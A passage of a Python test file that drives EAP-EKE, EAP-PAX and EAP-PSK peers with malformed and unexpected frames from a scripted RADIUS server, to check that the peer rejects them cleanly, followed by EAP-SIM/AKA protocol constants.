                               3, 0, 0, 0,
                               3, 1, 0, 0,
                               3, 1, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing IDType/Identity in EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4B4B4B4B4B",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 5 * 4,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               5, 0,
                               0, 0, 0, 0,
                               3, 0, 0, 0,
                               3, 1, 0, 0,
                               3, 1, 1, 0,
                               3, 1, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4BB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               1, 0,
                               3, 1, 1, 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4BB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               1, 0,
                               3, 1, 1, 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4BB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               1, 0,
                               3, 1, 1, 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected EAP-EKE-Confirm/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_CONFIRM)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short EAP-EKE-Failure/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_FAILURE)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected EAP-EKE-Commit/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_COMMIT)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4BB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               1, 0,
                               3, 1, 1, 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short EAP-EKE-Commit/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_COMMIT)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4BB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               1, 0,
                               1, 1, 1, 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
            return struct.pack(">BBHBB4L32L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 128,
                               EAP_TYPE_EKE,
                               EAP_EKE_COMMIT,
                               0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short EAP-EKE-Confirm/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_CONFIRM)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4BB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               1, 0,
                               1, 1, 1, 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
            return struct.pack(">BBHBB4L32L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 128,
                               EAP_TYPE_EKE,
                               EAP_EKE_COMMIT,
                               0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid PNonce_PS and Auth_S values in EAP-EKE-Confirm/Request")
            return struct.pack(">BBHBB4L8L5L5L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 2 * 16 + 20 + 20,
                               EAP_TYPE_EKE,
                               EAP_EKE_CONFIRM,
                               0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        return None
    srv = start_radius_server(eke_handler)
    if srv is None:
        return "skip"
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Each iteration restarts EAP authentication; the handler above
        # advances through its scripted cases one exchange at a time.
        for i in range(0, 14):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="EKE", identity="user", password="password",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            # These iterations end with the scripted EAP-Failure; wait for
            # it so the state machine completes before restarting.
            if i in [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 ]:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            else:
                time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
# EAP-PAX constants (RFC 4746)
# Op-codes
EAP_PAX_OP_STD_1 = 0x01
EAP_PAX_OP_STD_2 = 0x02
EAP_PAX_OP_STD_3 = 0x03
EAP_PAX_OP_SEC_1 = 0x11
EAP_PAX_OP_SEC_2 = 0x12
EAP_PAX_OP_SEC_3 = 0x13
EAP_PAX_OP_SEC_4 = 0x14
EAP_PAX_OP_SEC_5 = 0x15
EAP_PAX_OP_ACK = 0x21
# Flags bitfield
EAP_PAX_FLAGS_MF = 0x01
EAP_PAX_FLAGS_CE = 0x02
EAP_PAX_FLAGS_AI = 0x04
# MAC IDs
EAP_PAX_MAC_HMAC_SHA1_128 = 0x01
# NOTE(review): name lacks the MAC_ prefix used by its sibling above;
# presumably the same MAC ID family — confirm before renaming.
EAP_PAX_HMAC_SHA256_128 = 0x02
# DH Group IDs
EAP_PAX_DH_GROUP_NONE = 0x00
EAP_PAX_DH_GROUP_2048_MODP = 0x01
EAP_PAX_DH_GROUP_3072_MODP = 0x02
EAP_PAX_DH_GROUP_NIST_ECC_P_256 = 0x03
# Public Key IDs
EAP_PAX_PUBLIC_KEY_NONE = 0x00
EAP_PAX_PUBLIC_KEY_RSAES_OAEP = 0x01
EAP_PAX_PUBLIC_KEY_RSA_PKCS1_V1_5 = 0x02
EAP_PAX_PUBLIC_KEY_EL_GAMAL_NIST_ECC = 0x03
# ADE (Authenticated Data Exchange) types
EAP_PAX_ADE_VENDOR_SPECIFIC = 0x01
EAP_PAX_ADE_CLIENT_CHANNEL_BINDING = 0x02
EAP_PAX_ADE_SERVER_CHANNEL_BINDING = 0x03
def test_eap_proto_pax(dev, apdev):
    """EAP-PAX protocol tests"""
    def pax_std_1(ctx):
        # Well-formed PAX_STD-1 (HMAC_SHA1_128 MAC, no DH group, no public
        # key, 32-octet A value) carrying a precomputed 16-octet ICV that
        # matches this exact payload; used to get the peer into a session so
        # that a following bogus message is parsed mid-exchange.
        logger.info("Test: STD-1")
        ctx['id'] = 10
        return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 5 + 2 + 32 + 16,
                           EAP_TYPE_PAX,
                           EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                           EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                           32, 0, 0, 0, 0, 0, 0, 0, 0,
                           0x16, 0xc9, 0x08, 0x9d, 0x98, 0xa5, 0x6e, 0x1f,
                           0xf0, 0xac, 0xcf, 0xc4, 0x66, 0xcd, 0x2d, 0xbf)

    def pax_handler(ctx, req):
        # Stateful handler: ctx['num'] counts requests generated so far and
        # each idx-matched branch below fires exactly once, in order, one
        # per connection attempt made by the loop at the bottom of the test.
        logger.info("pax_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256

        idx = 0

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_PAX)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Minimum length payload")
            return struct.pack(">BBHB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 16,
                               EAP_TYPE_PAX,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported MAC ID")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, 255, EAP_PAX_DH_GROUP_NONE,
                               EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported DH Group ID")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               255, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported Public Key ID")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, 255,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: More fragments")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_MF,
                               EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid ICV")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid ICV in short frame")
            return struct.pack(">BBHBBBBBB3L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 12,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - unsupported op_code")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               255, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0x90, 0x78, 0x97, 0x38, 0x29, 0x94, 0x32, 0xd4,
                               0x81, 0x27, 0xe0, 0xf6, 0x3b, 0x0d, 0xb2, 0xb2)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - CE flag in STD-1")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_CE,
                               EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0x9c, 0x98, 0xb4, 0x0b, 0x94, 0x90, 0xde, 0x88,
                               0xb7, 0x72, 0x63, 0x44, 0x1d, 0xe3, 0x7c, 0x5c)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - too short STD-1 payload")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0xda, 0xab, 0x2c, 0xe7, 0x84, 0x41, 0xb5, 0x5c,
                               0xee, 0xcf, 0x62, 0x03, 0xc5, 0x69, 0xcb, 0xf4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - incorrect A length in STD-1")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xc4, 0xb0, 0x81, 0xe4, 0x6c, 0x8c, 0x20, 0x23,
                               0x60, 0x46, 0x89, 0xea, 0x94, 0x60, 0xf3, 0x2a)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - extra data in STD-1")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBBH8LB16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 1 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               1,
                               0x61, 0x49, 0x65, 0x37, 0x21, 0xe8, 0xd8, 0xbf,
                               0xf3, 0x02, 0x01, 0xe5, 0x42, 0x51, 0xd3, 0x34)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected STD-1")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xe5, 0x1d, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
                               0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
        idx += 1
        if ctx['num'] == idx:
            return pax_std_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: MAC ID changed during session")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_HMAC_SHA256_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xee, 0x00, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
                               0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
        idx += 1
        if ctx['num'] == idx:
            return pax_std_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: DH Group ID changed during session")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_2048_MODP,
                               EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xee, 0x01, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
                               0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
        idx += 1
        if ctx['num'] == idx:
            return pax_std_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Public Key ID changed during session")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE,
                               EAP_PAX_PUBLIC_KEY_RSAES_OAEP,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xee, 0x02, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
                               0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected STD-3")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_3, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0x47, 0xbb, 0xc0, 0xf9, 0xb9, 0x69, 0xf5, 0xcb,
                               0x3a, 0xe8, 0xe7, 0xd6, 0x80, 0x28, 0xf2, 0x59)
        idx += 1
        if ctx['num'] == idx:
            return pax_std_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            # TODO: MAC calculation; for now, this gets dropped due to incorrect
            # ICV
            logger.info("Test: STD-3 with CE flag")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_3, EAP_PAX_FLAGS_CE,
                               EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0x8a, 0xc2, 0xf9, 0xf4, 0x8b, 0x75, 0x72, 0xa2,
                               0x4d, 0xd3, 0x1e, 0x54, 0x77, 0x04, 0x05, 0xe2)

        idx += 1
        # After the numbered cases, alternate between an empty PAX request
        # and EAP-Failure based on counter parity.
        if ctx['num'] & 0x1 == idx & 0x1:
            logger.info("Test: Default request")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_PAX)
        else:
            logger.info("Test: Default EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)

    srv = start_radius_server(pax_handler)
    if srv is None:
        return "skip"

    try:
        hapd = start_ap(apdev[0]['ifname'])

        # One connection attempt per handler test case above.
        for i in range(0, 18):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PAX", identity="user",
                           password_hex="0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            logger.info("Waiting for EAP method to start")
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()

        logger.info("Too short password")
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PAX", identity="user",
                       password_hex="0123456789abcdef0123456789abcd",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        time.sleep(0.1)
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()

        logger.info("No password")
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PAX", identity="user",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        time.sleep(0.1)
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_psk(dev, apdev):
    """EAP-PSK protocol tests"""
    def psk_handler(ctx, req):
        # Stateful handler: ctx['num'] counts requests generated so far and
        # each idx-matched branch below fires exactly once, in order, one
        # per connection attempt made by the loop at the bottom of the test.
        logger.info("psk_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256

        idx = 0

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_PSK)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Non-zero T in first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0xc0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short third message")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_PSK)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Incorrect T in third message")
            return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing PCHANNEL in third message")
            return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 16,
                               EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            # Log message typo fixed: "Invalic" -> "Invalid"
            logger.info("Test: Invalid MAC_S in third message")
            return struct.pack(">BBHBB4L4L5LB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 16 + 21,
                               EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        return None

    srv = start_radius_server(psk_handler)
    if srv is None:
        return "skip"

    try:
        hapd = start_ap(apdev[0]['ifname'])

        # One connection attempt per handler test case above.
        for i in range(0, 6):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PSK", identity="user",
                           password_hex="0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")

        # Local validation case: PSK must be 16 octets, so this 15-octet
        # password is rejected by the peer before any exchange completes.
        logger.info("Test: Invalid PSK length")
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PSK", identity="user",
                       password_hex="0123456789abcdef0123456789abcd",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                               timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        time.sleep(0.1)
        dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
# EAP-SIM Subtype values
EAP_SIM_SUBTYPE_START = 10
EAP_SIM_SUBTYPE_CHALLENGE = 11
EAP_SIM_SUBTYPE_NOTIFICATION = 12
EAP_SIM_SUBTYPE_REAUTHENTICATION = 13
EAP_SIM_SUBTYPE_CLIENT_ERROR = 14

# EAP-AKA Subtype values
EAP_AKA_SUBTYPE_CHALLENGE = 1
EAP_AKA_SUBTYPE_AUTHENTICATION_REJECT = 2
EAP_AKA_SUBTYPE_SYNCHRONIZATION_FAILURE = 4
EAP_AKA_SUBTYPE_IDENTITY = 5
EAP_AKA_SUBTYPE_NOTIFICATION = 12
EAP_AKA_SUBTYPE_REAUTHENTICATION = 13
EAP_AKA_SUBTYPE_CLIENT_ERROR = 14

# EAP-SIM/AKA attribute types (shared attribute number space)
EAP_SIM_AT_RAND = 1
EAP_SIM_AT_AUTN = 2
EAP_SIM_AT_RES = 3
EAP_SIM_AT_AUTS = 4
EAP_SIM_AT_PADDING = 6
EAP_SIM_AT_NONCE_MT = 7
EAP_SIM_AT_PERMANENT_ID_REQ = 10
EAP_SIM_AT_MAC = 11
EAP_SIM_AT_NOTIFICATION = 12
EAP_SIM_AT_ANY_ID_REQ = 13
EAP_SIM_AT_IDENTITY = 14
EAP_SIM_AT_VERSION_LIST = 15
